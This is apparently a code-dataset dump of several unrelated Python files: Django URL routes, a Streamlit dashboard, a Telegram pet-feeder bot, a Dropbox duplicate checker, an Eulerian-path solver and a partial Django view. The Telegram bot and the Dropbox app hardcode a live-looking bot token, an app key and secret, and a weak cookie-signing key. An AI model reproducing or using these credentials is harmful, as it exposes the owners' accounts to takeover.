url(r'^dochs/format/$', views.dochsFormat),\n url(r'^dochs/([1-9][0-9]*)$', views.dochs_by_id),\n url(r'^dochs/publish/$', views.dochs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docis/$', views.docis),\n url(r'^docis/format/$', views.docisFormat),\n url(r'^docis/([1-9][0-9]*)$', views.docis_by_id),\n url(r'^docis/publish/$', views.docis_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docjs/$', views.docjs),\n url(r'^docjs/format/$', views.docjsFormat),\n url(r'^docjs/([1-9][0-9]*)$', views.docjs_by_id),\n url(r'^docjs/publish/$', views.docjs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docks/$', views.docks),\n url(r'^docks/format/$', views.docksFormat),\n url(r'^docks/([1-9][0-9]*)$', views.docks_by_id),\n url(r'^docks/publish/$', views.docks_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', 
views.handle_file),\n\n url(r'^docls/$', views.docls),\n url(r'^docls/format/$', views.doclsFormat),\n url(r'^docls/([1-9][0-9]*)$', views.docls_by_id),\n url(r'^docls/publish/$', views.docls_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docms/$', views.docms),\n url(r'^docms/format/$', views.docmsFormat),\n url(r'^docms/([1-9][0-9]*)$', views.docms_by_id),\n url(r'^docms/publish/$', views.docms_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docns/$', views.docns),\n url(r'^docns/format/$', views.docnsFormat),\n url(r'^docns/([1-9][0-9]*)$', views.docns_by_id),\n url(r'^docns/publish/$', views.docns_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docos/$', views.docos),\n url(r'^docos/format/$', views.docosFormat),\n url(r'^docos/([1-9][0-9]*)$', views.docos_by_id),\n url(r'^docos/publish/$', views.docos_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docps/$', views.docps),\n url(r'^docps/format/$', views.docpsFormat),\n url(r'^docps/([1-9][0-9]*)$', views.docps_by_id),\n url(r'^docps/publish/$', views.docps_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^internationalDogs/$', views.internationalDogs),\n url(r'^internationalDogs/format/$', views.internationalDogsFormat),\n url(r'^internationalDogs/([1-9][0-9]*)$', views.internationalDogs_by_id),\n url(r'^internationalDogs/publish/$', views.internationalDogs_publish),\n\n url(r'^internationalAccrs/$', views.internationalAccrs),\n url(r'^internationalAccrs/format/$', views.internationalAccrsFormat),\n url(r'^internationalAccrs/([1-9][0-9]*)$', views.internationalAccrs_by_id),\n url(r'^internationalAccrs/publish/$', views.internationalAccrs_publish),\n\n url(r'^svedenOnes/$', views.svedenOnes),\n url(r'^svedenOnes/format/$', views.svedenOnesFormat),\n url(r'^svedenOnes/([1-9][0-9]*)$', views.svedenOnes_by_id),\n url(r'^svedenOnes/publish/$', views.svedenOnes_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^svedenTwos/$', views.svedenTwos),\n url(r'^svedenTwos/format/$', views.svedenTwosFormat),\n url(r'^svedenTwos/([1-9][0-9]*)$', views.svedenTwos_by_id),\n url(r'^svedenTwos/publish/$', views.svedenTwos_publish),\n\n url(r'^specCabs/$', views.specCabs),\n url(r'^specCabs/format/$', views.specCabsFormat),\n url(r'^specCabs/([1-9][0-9]*)$', views.specCabs_by_id),\n url(r'^specCabs/publish/$', views.specCabs_publish),\n\n url(r'^specPracs/$', views.specPracs),\n url(r'^specPracs/format/$', views.specPracsFormat),\n url(r'^specPracs/([1-9][0-9]*)$', views.specPracs_by_id),\n url(r'^specPracs/publish/$', views.specPracs_publish),\n\n url(r'^specLibs/$', views.specLibs),\n url(r'^specLibs/format/$', views.specLibsFormat),\n url(r'^specLibs/([1-9][0-9]*)$', views.specLibs_by_id),\n url(r'^specLibs/publish/$', views.specLibs_publish),\n\n url(r'^specSports/$', views.specSports),\n url(r'^specSports/format/$', views.specSportsFormat),\n url(r'^specSports/([1-9][0-9]*)$', views.specSports_by_id),\n url(r'^specSports/publish/$', views.specSports_publish),\n\n url(r'^specMeals/$', views.specMeals),\n url(r'^specMeals/format/$', views.specMealsFormat),\n url(r'^specMeals/([1-9][0-9]*)$', views.specMeals_by_id),\n url(r'^specMeals/publish/$', 
views.specMeals_publish),\n\n url(r'^specHealths/$', views.specHealths),\n url(r'^specHealths/format/$', views.specHealthsFormat),\n url(r'^specHealths/([1-9][0-9]*)$', views.specHealths_by_id),\n url(r'^specHealths/publish/$', views.specHealths_publish),\n\n url(r'^ovzs/$', views.ovzs),\n url(r'^ovzs/format/$', views.ovzsFormat),\n url(r'^ovzs/([1-9][0-9]*)$', views.ovzs_by_id),\n url(r'^ovzs/publish/$', views.ovzs_publish),\n\n url(r'^linkOvzs/$', views.linkOvzs),\n url(r'^linkOvzs/format/$', views.linkOvzsFormat),\n url(r'^linkOvzs/([1-9][0-9]*)$', views.linkOvzs_by_id),\n url(r'^linkOvzs/publish/$', views.linkOvzs_publish),\n\n url(r'^ovzTwos/$', views.ovzTwos),\n url(r'^ovzTwos/format/$', views.ovzTwosFormat),\n url(r'^ovzTwos/([1-9][0-9]*)$', views.ovzTwos_by_id),\n url(r'^ovzTwos/publish/$', views.ovzTwos_publish),\n\n url(r'^grants/$', views.grants),\n url(r'^grants/format/$', views.grantsFormat),\n url(r'^grants/([1-9][0-9]*)$', views.grants_by_id),\n url(r'^grants/publish/$', views.grants_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^grantInfos/$', views.grantInfos),\n url(r'^grantInfos/format/$', views.grantInfosFormat),\n url(r'^grantInfos/([1-9][0-9]*)$', views.grantInfos_by_id),\n url(r'^grantInfos/publish/$', views.grantInfos_publish),\n\n url(r'^grantInfoTwos/$', views.grantInfoTwos),\n url(r'^grantInfoTwos/format/$', views.grantInfoTwosFormat),\n url(r'^grantInfoTwos/([1-9][0-9]*)$', views.grantInfoTwos_by_id),\n url(r'^grantInfoTwos/publish/$', views.grantInfoTwos_publish),\n\n url(r'^acts/$', views.acts),\n url(r'^acts/format/$', views.actsFormat),\n url(r'^acts/([1-9][0-9]*)$', views.acts_by_id),\n url(r'^acts/publish/$', views.acts_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^jobs/$', views.jobs),\n url(r'^jobs/format/$', views.jobsFormat),\n url(r'^jobs/([1-9][0-9]*)$', views.jobs_by_id),\n url(r'^jobs/publish/$', views.jobs_publish),\n\n url(r'^gosAccreditations/$', views.gosAccreditations),\n url(r'^gosAccreditations/format/$', views.gosAccreditationsFormat),\n url(r'^gosAccreditations/([1-9][0-9]*)$', views.gosAccreditations_by_id),\n url(r'^gosAccreditations/publish/$', views.gosAccreditations_publish),\n\n url(r'^profs/$', views.profs),\n url(r'^profs/format/$', views.profsFormat),\n url(r'^profs/([1-9][0-9]*)$', views.profs_by_id),\n url(r'^profs/publish/$', views.profs_publish),\n\n url(r'^infs/$', views.infs),\n url(r'^infs/format/$', views.infsFormat),\n url(r'^infs/([1-9][0-9]*)$', views.infs_by_id),\n url(r'^infs/publish/$', views.infs_publish),\n\n url(r'^admiss/$', views.admiss),\n url(r'^admiss/format/$', views.admissFormat),\n url(r'^admiss/([1-9][0-9]*)$', views.admiss_by_id),\n url(r'^admiss/publish/$', views.admiss_publish),\n\n url(r'^perevs/$', views.perevs),\n url(r'^perevs/format/$', views.perevsFormat),\n url(r'^perevs/([1-9][0-9]*)$', views.perevs_by_id),\n url(r'^perevs/publish/$', views.perevs_publish),\n\n url(r'^obrazs/$', views.obrazs),\n url(r'^obrazs/format/$', views.obrazsFormat),\n url(r'^obrazs/([1-9][0-9]*)$', views.obrazs_by_id),\n url(r'^obrazs/publish/$', views.obrazs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^practics/$', views.practics),\n url(r'^practics/format/$', views.practicsFormat),\n url(r'^practics/([1-9][0-9]*)$', views.practics_by_id),\n url(r'^practics/publish/$', views.practics_publish),\n 
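# NOTE: the upload-file/download-file pairs repeated throughout this list duplicate the ones registered earlier; Django resolves a request against the first matching pattern, so the later duplicates are never reached.\n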
url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^sciencs/$', views.sciencs),\n url(r'^sciencs/format/$', views.sciencsFormat),\n url(r'^sciencs/([1-9][0-9]*)$', views.sciencs_by_id),\n url(r'^sciencs/publish/$', views.sciencs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^svedOrgs/$', views.svedOrgs),\n url(r'^svedOrgs/format/$', views.svedOrgsFormat),\n url(r'^svedOrgs/([1-9][0-9]*)$', views.svedOrgs_by_id),\n url(r'^svedOrgs/publish/$', views.svedOrgs_publish),\n\n url(r'^facilits/$', views.facilits),\n url(r'^facilits/format/$', views.facilitsFormat),\n url(r'^facilits/([1-9][0-9]*)$', views.facilits_by_id),\n url(r'^facilits/publish/$', views.facilits_publish),\n\n url(r'^objPracts/$', views.objPracts),\n url(r'^objPracts/format/$', views.objPractsFormat),\n url(r'^objPracts/([1-9][0-9]*)$', views.objPracts_by_id),\n url(r'^objPracts/publish/$', views.objPracts_publish),\n\n url(r'^librares/$', views.librares),\n url(r'^librares/format/$', views.libraresFormat),\n url(r'^librares/([1-9][0-9]*)$', views.librares_by_id),\n url(r'^librares/publish/$', views.librares_publish),\n\n url(r'^sports/$', views.sports),\n url(r'^sports/format/$', views.sportsFormat),\n url(r'^sports/([1-9][0-9]*)$', views.sports_by_id),\n url(r'^sports/publish/$', views.sports_publish),\n\n url(r'^meals/$', views.meals),\n url(r'^meals/format/$', views.mealsFormat),\n url(r'^meals/([1-9][0-9]*)$', views.meals_by_id),\n url(r'^meals/publish/$', views.meals_publish),\n\n url(r'^healts/$', views.healts),\n url(r'^healts/format/$', views.healtsFormat),\n url(r'^healts/([1-9][0-9]*)$', views.healts_by_id),\n url(r'^healts/publish/$', views.healts_publish),\n\n url(r'^ones/$', views.ones),\n url(r'^ones/format/$', views.onesFormat),\n url(r'^ones/([1-9][0-9]*)$', views.ones_by_id),\n url(r'^ones/publish/$', views.ones_publish),\n\n url(r'^twos/$', views.twos),\n url(r'^twos/format/$', views.twosFormat),\n url(r'^twos/([1-9][0-9]*)$', views.twos_by_id),\n url(r'^twos/publish/$', views.twos_publish),\n\n url(r'^threes/$', views.threes),\n url(r'^threes/format/$', views.threesFormat),\n url(r'^threes/([1-9][0-9]*)$', views.threes_by_id),\n url(r'^threes/publish/$', views.threes_publish),\n\n url(r'^fours/$', views.fours),\n url(r'^fours/format/$', views.foursFormat),\n url(r'^fours/([1-9][0-9]*)$', views.fours_by_id),\n url(r'^fours/publish/$', views.fours_publish),\n\n url(r'^fives/$', views.fives),\n url(r'^fives/format/$', views.fivesFormat),\n url(r'^fives/([1-9][0-9]*)$', views.fives_by_id),\n url(r'^fives/publish/$', views.fives_publish),\n\n url(r'^sixs/$', views.sixs),\n url(r'^sixs/format/$', views.sixsFormat),\n url(r'^sixs/([1-9][0-9]*)$', views.sixs_by_id),\n url(r'^sixs/publish/$', views.sixs_publish),\n\n url(r'^sevens/$', views.sevens),\n url(r'^sevens/format/$', views.sevensFormat),\n url(r'^sevens/([1-9][0-9]*)$', views.sevens_by_id),\n url(r'^sevens/publish/$', views.sevens_publish),\n\n url(r'^SaveFile$', views.SaveFile)\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"CombatLynx/Back","sub_path":"DjangoAPI/EmployeeApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":25442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22006748996","text":"import streamlit as st\r\nimport plotly.express as px\r\nfrom PIL import Image\r\nimport pandas as 
pd\r\n\r\nst.set_page_config(page_title=\"Mess Review\", page_icon=\"🍞\", layout=\"wide\")\r\nst.header(\"Welcome To ***Mess Review System*** 🍱\")\r\n\r\n#loading database\r\nexcel_file = \"mess_monthly_review.xlsx\"\r\nsheet_name = \"month12\"\r\n\r\ndf = pd.read_excel(excel_file,\r\n sheet_name=sheet_name,\r\n usecols='A:C',\r\n header = 0)\r\n\r\ndf_participants=pd.read_excel(excel_file,sheet_name = sheet_name,usecols='G:h',header = 0)\r\ndf_participants.dropna(inplace=True)\r\n\r\n# collection and selection\r\nfood_item = df[\"FOOD_ITEM\"].unique().tolist()\r\n\r\ndate = df['DATE'].unique().tolist()\r\n\r\ndate_selection = st.slider(\"Date:\",\r\n min_value=min(date),\r\n max_value=max(date),\r\n value = (min(date), max(date)))\r\n\r\nfood_item_selection=st.multiselect('FOOD ITEM:',\r\n food_item,\r\n default=food_item)\r\n\r\n\r\n#FILTERING DATAFRAME BASED ON THE SELECTION\r\n\r\nmask=(df[\"DATE\"].between(*date_selection)) & (df[\"FOOD_ITEM\"].isin(food_item_selection))\r\nnumber_of_result = df[mask].shape[0]\r\nst.markdown(f\"*Available Results: {number_of_result}*\")\r\n\r\ndf_grouped = df[mask].groupby(by = [\"REVIEW\"]).count()[[\"DATE\"]]\r\ndf_grouped = df_grouped.rename(columns={\"DATE\":\"Date\"})\r\ndf_grouped = df_grouped.reset_index()\r\n\r\n\r\n#PLOTTING BAR_CHART\r\nbar_chart=px.bar(df_grouped,\r\n x=\"REVIEW\",\r\n y=\"Date\",\r\n text=\"Date\",\r\n color_discrete_sequence=['#F63366']*len(df_grouped),\r\n template='plotly_white')\r\n\r\nst.plotly_chart(bar_chart)\r\n\r\n\r\n\r\nst.dataframe(df_participants)\r\n\r\npie_chart = px.pie(df_participants,\r\n title = \"Weekly Review\",\r\n values = \"Rev.\",\r\n names=\"Food\")\r\n\r\nst.plotly_chart(pie_chart)","repo_name":"gyash1512/KhollPoll","sub_path":"KhollPoll/monthly_rev.py","file_name":"monthly_rev.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72486087868","text":"n = int(input(\"Enter the value of n: \"))\nemployeeList = []\nprint(\"Now enter the ages: \")\nfor i in range(n):\n employeeList.append(int(input()))\n\ngroup1 = 0\ngroup2 = 0\ngroup3 = 0\n\nfor i in employeeList:\n if i >= 26 and i <= 35:\n group1 += 1\n elif i >= 36 and i <= 45:\n group2 += 1\n elif i >= 46 and i <= 55:\n group3 += 1\n\nprint(f\"Group1: {group1} Group2: {group2} Group3: {group3}\")\n","repo_name":"arnab7070/BeyondCoding","sub_path":"Python Programs/AOT IT Workshop/Final Lab Exam Revison/question25.py","file_name":"question25.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"70091424507","text":"import requests\nimport telebot\nimport os\n\nfrom telebot.types import Message\n\nbot = telebot.TeleBot(\"2131240436:AAEesff5vTebqaJkdwg3xJdDOjzW-fXTTUo\")\n\n# Handler for the bot's Start command\n@bot.message_handler(commands=['start'])\ndef start_command(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n keyboard.row(\n telebot.types.InlineKeyboardButton('Luna', callback_data='get-Luna'),\n telebot.types.InlineKeyboardButton('Rambo', callback_data='get-Rambo')\n )\n bot.send_message(\n message.chat.id,\n 'Bienvenido a PetBot!\\n' +\n 'A continuación podrás consultar la información de las mascotas registradas\\n' +\n 'Si Deseas saber otro comandos o más información usa /help o /about\\n' +\n 'Selecciona la mascota de la cual deseas saber su información: \\n',\n reply_markup=keyboard\n )\n\n# Handler for the Luna button of the /Start command\n@bot.callback_query_handler(lambda query: query.data == \"get-Luna\")\ndef iq_callback(query):\n id_mascota = \"9C E8 76 6E\"\n printInfo(query.message,id_mascota)\n\n# Handler for the Rambo button of the /Start command\n@bot.callback_query_handler(lambda query: query.data == \"get-Rambo\")\ndef iq_callback(query):\n id_mascota = \"1A E8 C2 82\"\n printInfo(query.message,id_mascota)\n\n# Function that performs a GET request to the database\ndef printInfo(message,id_mascota):\n URL = '192.168.1.240'\n port = '3000'\n data = 'http://'+ URL + ':' + port + '/api/getInfo/' + id_mascota\n r = requests.get(data)\n pet = r.json()['data'][0]\n print(pet)\n bot.send_message(\n message.chat.id,\n 'Información de ' + pet['nombreMascota'] + '\\n' +\n 'ID de la mascota: ' + pet['idMascota'] + '\\n' +\n 'Raza de la mascota: ' + pet['raza'] + '\\n' +\n 'Intervalo de comidas: ' + str(pet['intervaloComida']) + ' hora(s).\\n'\n )\n\n# Handler for the HELP command\n@bot.message_handler(commands=['help'])\ndef help_command(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n keyboard.add(\n telebot.types.InlineKeyboardButton(\n 'Manda un correo!', url='mailto:a00829799@itesm.mx?subject=Ayuda%20-%20PetBot'\n )\n )\n bot.send_message(\n message.chat.id,\n 'Bienvenido! Puedes encontrar a continuación una lista de los comandos más importantes:\\n' +\n '/start - Realiza peticiones sobre el estado de tus mascotas\\n' +\n '/help - Desplegar las opciones del bot\\n' + \n '/about - Información sobre el bot\\n' + \n '/foto - Recibe una foto en tiempo real de lo que ve el dispensador.\\n' +\n 'Si necesitas ayuda, mandame un correo.',\n reply_markup=keyboard\n )\n\n# Handler for the About command\n@bot.message_handler(commands=['about'])\ndef info_about(message):\n bot.send_message(\n\tmessage.chat.id,\n\t'PETBOT es un dispositivo que se encarga de brindar la comida a las mascotas según las especificaciones de tiempo determinado.\\n' + \n\t'Esto permite a las personas llevar un registro de las veces que la mascota se acerca a comer al día.\\n' +\n\t'Este bot es un complemento al dispositivo para que el usuario pueda conseguir la informacion mas relevante sobre el estado de su mascota.'\n )\n\n# Handler for the foto (photo) command\n@bot.message_handler(commands=['foto'])\ndef foto_command(message):\n bot.send_message(\n message.chat.id,\n 'Espera un Momento por favor'\n )\n os.system(\"libcamera-jpeg -o test.jpg -n\")\n bot.send_message(\n\tmessage.chat.id,\n\t'Foto Tomada'\n )\n bot.send_photo(message.chat.id, photo=open('test.jpg', 'rb'))\n\nbot.polling(none_stop=True)\n","repo_name":"ianjduran/proyecto-iot-equipo-1","sub_path":"telegram bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"69976457467","text":"class Energy:\n\tdef __init__(self, kwargs):\n\t\t# initial energy of each node\n\t\tself.init = kwargs.get('init', 0.5)\n\n\t\t# energy for transferring of each bit \n\t\tself.trans = kwargs.get('trans', 50*0.000000001)\n\n\t\t# energy for receiving of each bit \n\t\tself.rec = kwargs.get('rec', 50*0.000000001)\n\n\t\t# energy for Data Aggregation \n\t\tself.data_aggr = kwargs.get('data_aggr', 5*0.000000001)\n\n\t\t# energy for free space model\n\t\tself.free_space = kwargs.get('free_space', 10*0.000000000001)\n\n\t\t# energy for multi path model\n\t\tself.multi_path = kwargs.get('multi_path', 0.0013*0.000000000001)\n\n\t\t# data aggregation energy\n\t\tself.aggr = 
kwargs.get('aggr', 5*0.000000001)\n\n\tdef __str__(self):\n\t\tresponse = \"\"\n\t\tresponse += \"init = %.1E\\n\" % self.init\n\t\tresponse += \"trans = %.1E\\n\" % self.trans\n\t\tresponse += \"rec = %.1E\\n\" % self.rec\n\t\tresponse += \"free_space = %.1E\\n\" % self.free_space\n\t\tresponse += \"multi_path = %.1E\\n\" % self.multi_path\n\t\tresponse += \"aggr = %.1E\\n\" % self.aggr\n\n\t\treturn response","repo_name":"aditya999123/SLP","sub_path":"Energy.py","file_name":"Energy.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6268713002","text":"'''\r\nEulerian Path Solution\r\n'''\r\n\r\n'''\r\nA Eulerian path in a deBruijn graph represents a path through the graph that crosses every edge\r\nexactly once. In order for a graph to have a Eulerian path, at most two nodes can be unbalanced.\r\nOf these two nodes, the node with more outward edges will be used as the starting position, and\r\nthe node with more inward edges will be the final node. This algorithm searches for a Eulerian\r\npath in a deBruijn graph by first determining which nodes are unbalanced by counting their outward\r\nedges and comparing this to all other nodes. Once a start position has been determined, a depth\r\nfirst search is performed until a path is found that exhausts all edges, and the final path through\r\nthe graph is returned with directed edges connecting nodes in sequence.\r\n'''\r\n\r\n\r\n\r\nfrom random import randint\r\nfrom copy import deepcopy\r\n\r\n\r\ndef create_adj_list(graph):\r\n adj_list = {} # key: node, value: nodes connected by outward edges\r\n circuit_max = 0\r\n for line in graph:\r\n node = line.strip('\\n') # form: 1: 2 3\r\n node = node.replace(':', '') # form: 1 2 3\r\n node = node.replace(' ', ',') # form: 1,2,3\r\n node = node.replace(',', ' ', 1) # form: 1 2,3\r\n node = node.split(' ') # form: 1 \\n 2,3\r\n adj_list.setdefault(node[0], [])\r\n for number in node[1].split(','):\r\n adj_list[node[0]].append(number) # adj_list['1] -> '1': ['2', '3']\r\n circuit_max += 1\r\n return adj_list, circuit_max\r\n\r\n\r\n\r\ndef find_start(red_adj_list):\r\n start = {}\r\n for key in red_adj_list:\r\n start.setdefault(key, 0)\r\n start[key] += len(red_adj_list[key])\r\n end = {}\r\n for key in red_adj_list:\r\n for value in red_adj_list[key]:\r\n end.setdefault(value, 0)\r\n end[value] += 1\r\n for key in end:\r\n try:\r\n if start[key] != end[key]:\r\n if start[key] > end[key]:\r\n start_node = key\r\n if start[key] < end[key]:\r\n end_node = key\r\n except KeyError:\r\n end_node = key\r\n for key in start:\r\n try:\r\n if end[key] != start[key]:\r\n if end[key] < start[key]:\r\n start_node = key\r\n if end[key] > start[key]:\r\n end_node = key\r\n except KeyError:\r\n start_node = key\r\n if end_node not in red_adj_list:\r\n red_adj_list[end_node] = []\r\n return red_adj_list, start_node\r\n\r\n\r\ndef eulerian_path(graph):\r\n # If inporting from file:\r\n # adj_list, circuit_max = create_adj_list(graph)\r\n # If using dictionary form:\r\n adj_list = graph\r\n circuit_max = sum(len(i) for i in list(adj_list.values()))\r\n red_adj_list = {}\r\n red_adj_list = deepcopy(adj_list)\r\n red_adj_list, start_node = find_start(red_adj_list)\r\n start = start_node\r\n curr_vert = start_node\r\n stack = []\r\n circuit = [] # eulerian path build as nodes run out of edges\r\n while len(circuit) != circuit_max: # continues increasing length of path until every edge has been crossed\r\n if 
len(red_adj_list[curr_vert]) > 0: # checks if outward edges are available\r\n stack.append(curr_vert)\r\n pick = randint(0, len(red_adj_list[curr_vert]) - 1) # picks random remaining outward edge\r\n temp = deepcopy(curr_vert) # temporary copy of current vertex for indexing\r\n curr_vert = red_adj_list[temp][pick] # random node to continue current path\r\n red_adj_list[temp].remove(curr_vert) # remove edge connecting current and previous nodes\r\n else:\r\n circuit.append(curr_vert) # adds node to final path once it has no outward edges left\r\n curr_vert = stack[len(stack) - 1]\r\n stack.pop() # removes from list of nodes with available edges\r\n path = ''\r\n path += start\r\n for vert in reversed(circuit):\r\n path += ('->' + vert)\r\n return path\r\n\r\n\r\n\r\n\r\n'''\r\nExample\r\n'''\r\n\r\n\r\nprint(eulerian_path({'TA': ['AA', 'AG'], 'AA': ['AT'], 'AT': ['TG'], 'TG': ['GT'], 'GT': ['TT'], 'TT': ['TA']}))\r\n\r\n\r\n# Output: TA->AA->AT->TG->GT->TT->TA->AG\r\n","repo_name":"Etsuna56/BioinformaticsAlgorithms","sub_path":"Bioinformatics2/eulerian_path.py","file_name":"eulerian_path.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30788366864","text":"#!/usr/bin/python3\nfrom dropbox.client import DropboxOAuth2Flow as DBAuth, DropboxClient as DBClient\nfrom bottle import route, template, post, run, request, redirect, response\nfrom tasks import check_task\n\ntpl = '''\n\n\n \n Dropbox MD5 Checker\n \n \n\tНовый поиск:
\n<!-- NOTE: the original HTML tags of this template were lost; the minimal markup below is a reconstruction, with field names taken from the POST handler (request.forms.path / request.forms.extensions) -->\n<form action=\"/\" method=\"post\">\n %setdefault('path', '/')\n %setdefault('extensions', '.doc, .txt') \n <input type=\"text\" name=\"path\" value=\"{{path}}\"/><br/>\n <input type=\"text\" name=\"extensions\" value=\"{{extensions}}\"/><br/>\n <input type=\"submit\"/>\n</form>\n %if defined('status'):\n <br/>\n Информация о задаче:<br/>\n Task status: {{status}}<br/>\n\t Path: {{path}}<br/>\n Extensions: {{extensions}}<br/>\n %end\n %if defined('coincidences'):\n <br/>\n Совпадения:<br/>\n %if coincidences:\n %for coincidence in coincidences:\n\t\t ► \n %for cpath in coincidence:\n {{cpath}} \n %end\n
\n %end\n %else:\n None\n %end\n %end\n \n\n'''\n\ntoken_name = b'dropbox-auth-csrf-token'\nsecret_key = \"secret key \"\nredirect_link = 'https://check.amokrov.org/check'\ndef get_flow(session):\n return DBAuth('bn4hy3qqp8ysquo', '4d53zmc6n8ldvo4', redirect_link, session, token_name)\n\ndef get_flow_start():\n session = dict()\n start = get_flow(session).start()\n response.set_cookie('token', str(session[token_name]), secret=secret_key, \n httponly=True, path='/', max_age=18000)\n return start\n\ndef get_flow_finish():\n return get_flow({token_name: request.get_cookie('token', secret=secret_key)}).finish(request.query)[0]\n\ndefault_path = '/'\ndefault_extensions = ['.doc', '.txt']\n\n@route('/')\ndef index():\n return template(tpl)\n\n@post('/')\ndef index_post():\n post_path = request.forms.path.strip()\n post_extensions = [extension.strip() for extension in request.forms.extensions.split(',')]\n if not len(post_path):\n post_path = default_path\n if not len(post_extensions) or not len(post_extensions[0]):\n post_extensions = default_extensions\n response.set_cookie('folder', post_path, secret=secret_key, httponly=True, path='/', max_age=18000)\n response.set_cookie('extensions', post_extensions, secret=secret_key, httponly=True, path='/', max_age=18000)\n redirect(get_flow_start())\n\n@route('/check')\ndef check():\n post_path = request.get_cookie('folder', secret=secret_key)\n post_extensions = request.get_cookie('extensions', secret=secret_key)\n if post_path is None:\n post_path = default_path\n if post_extensions is None:\n post_extensions = default_extensions\n response.set_cookie('guid', check_task.delay(\n DBClient(get_flow_finish()), \n post_path,\n post_extensions).id, \n secret=secret_key, httponly=True, path='/', max_age=18000)\n redirect('/result')\n\n@route('/result')\ndef result():\n post_path = request.get_cookie('folder', secret=secret_key)\n post_extensions = request.get_cookie('extensions', secret=secret_key)\n if post_path is None:\n post_path = default_path\n if post_extensions is None:\n post_extensions = default_extensions\n post_extensions = \", \".join(post_extensions)\n guid = request.get_cookie('guid', secret=secret_key)\n if guid is None:\n redirect('/')\n results = check_task.AsyncResult(guid)\n if results is None:\n return template(tpl, status='does not exist', path=post_path, extensions=post_extensions)\n if not results.ready():\n return template(tpl, status=results.status, path=post_path, extensions=post_extensions)\n return template(tpl, status=results.status, path=post_path, extensions=post_extensions, coincidences=results.get())\n\nrun(host='localhost', port=8081, reloader=True, debug=True, server='cherrypy')\n","repo_name":"sanyappc/duplicate-finder","sub_path":"filecheck.py","file_name":"filecheck.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31487414584","text":"import random\n\n# Split string method\nnames_string = input(\"Give me everybody's names, separated by a comma. 
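(for example: Alice, Bob, Charlie)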
\")\nnames = names_string.split(\", \")\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\n\n'''\nThe programm will randomly determine a person who will pay the bill :)\n'''\n\n# Get the total number of list names:\n\nnum_item = len(names)\n\n# Genarate a random number between 0 and last item:\n\nrandom_choice = random.randint(0, num_item - 1)\nthe_person_who_will_pay = names[random_choice]\nprint(the_person_who_will_pay + \" is going to buy the meal today\")\n\n# the_person_who_will_pay = random.choice(names) # ------ the advanced way using 'choice()'\n","repo_name":"Tsar36/100days_of_python","sub_path":"Who_pay_meal.py","file_name":"Who_pay_meal.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38254712030","text":"from django.core.exceptions import PermissionDenied\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom hknweb.utils import login_and_permission\n\nfrom hknweb.candidate.forms import ChallengeConfirmationForm\nfrom hknweb.candidate.models import OffChallenge\nfrom hknweb.candidate.utils import send_challenge_confirm_email\n\n\n@login_and_permission(\"candidate.change_offchallenge\")\ndef officer_confirm_view(request, pk):\n \"\"\"Officer views and confirms a challenge request after clicking email link.\n Only the officer who gave the challenge can review it.\"\"\"\n challenge = OffChallenge.objects.get(id=pk)\n if request.user.id != challenge.officer.id:\n raise PermissionDenied # not the officer that gave the challenge\n\n requester_name = challenge.requester.get_full_name()\n form = ChallengeConfirmationForm(request.POST or None, instance=challenge)\n context = {\n \"challenge\": challenge,\n \"requester_name\": requester_name,\n \"form\": form,\n }\n\n if form.is_valid():\n form.instance.reviewed = True\n form.save()\n # csec has already confirmed, and now officer confirms\n if challenge.officer_confirmed is True and challenge.csec_confirmed is True:\n send_challenge_confirm_email(request, form.instance, True)\n # csec has not already rejected, and now officer rejects\n elif (\n challenge.officer_confirmed is False\n and challenge.csec_confirmed is not False\n ):\n 